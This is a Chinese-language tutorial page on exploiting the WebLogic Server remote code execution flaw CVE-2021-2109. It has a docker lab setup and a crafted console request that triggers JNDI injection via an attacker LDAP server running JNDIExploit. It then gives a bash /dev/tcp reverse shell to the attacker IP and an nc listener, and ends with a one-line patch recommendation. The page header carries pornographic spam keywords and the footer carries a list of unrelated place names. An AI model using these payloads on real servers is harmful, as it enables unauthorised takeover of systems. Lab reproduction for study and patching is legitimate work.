亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

發布時間:2021-12-28 20:16:22 來源:億速云 閱讀:117 作者:柒染 欄目:安全技術

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

一、漏洞描述

2021年1月20日,Oracle官方發布了漏洞補丁,修了包括 CVE-2021-2109 Weblogic Server遠程代碼執行漏洞在內的多個高危嚴重漏洞。CVE-2021-2109 中,攻擊者可構造惡意請求,造成JNDI注入,執行任意代碼,從而控制服務器

影響版本

  1. WebLogic 3.6.0.0

  2. WebLogic 1.3.0.0

  3. WebLogic 2.1.3.0

  4. WebLogic 2.1.4.0

  5. WebLogic 1.1.0.0

環境搭建

攻擊機(kali):192.168.159.131  靶機:192.168.159.139

這里使用docker來搭建環境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

訪問http://your-ip:49163/console即可看到頁面

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

漏洞復現

使用burpsuit截取訪問http://your-ip:49163/console報文,發送到repeater模塊

1、將GET /console/console.portal?_nfpb=true HTTP/1.1修改為POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.159;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

請注意192.168.159;131地址的第三位后面為分號,192.168.159;131為啟動LDAP服務的攻擊機IP

2、在cookie上方添加“cmd:id”來獲取靶機服務器id信息,如下圖所示

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

3、在攻擊機上啟動LDAP

下載地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

java -jar JNDIExploit-v1.11.jar -i 192.168.159.131

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

4、重放修改過的報文,成功獲取到靶機上的id信息

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

5、反彈shell

在http://www.jackson-t.ca/runtime-exec-payloads.html網站將bash -i >& /dev/tcp/192.168.159.131/2333 0>&1 進行base64編碼

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

將編碼后的反彈shell命令復制到下圖cmd后面進行重放,同時在攻擊機上開啟nc –lvvp 2333命令監聽2333端口,點擊發送

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

成功反彈回shell

如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈

修復建議

升級官方安全補丁

看完上述內容,你們掌握如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

兴化市| 灵武市| 池州市| 丘北县| 吉首市| 胶州市| 蛟河市| 龙口市| 漳平市| 大兴区| 华容县| 红桥区| 西盟| 赣榆县| 登封市| 哈巴河县| 凤台县| 宁强县| 锡林浩特市| 吴忠市| 墨竹工卡县| 丰原市| 达孜县| 泸定县| 东平县| 双鸭山市| 甘孜| 龙门县| 兖州市| 郑州市| 尼勒克县| 蓬安县| 七台河市| 图木舒克市| 萍乡市| 阿克苏市| 遂宁市| 山阴县| 娄底市| 同心县| 石景山区|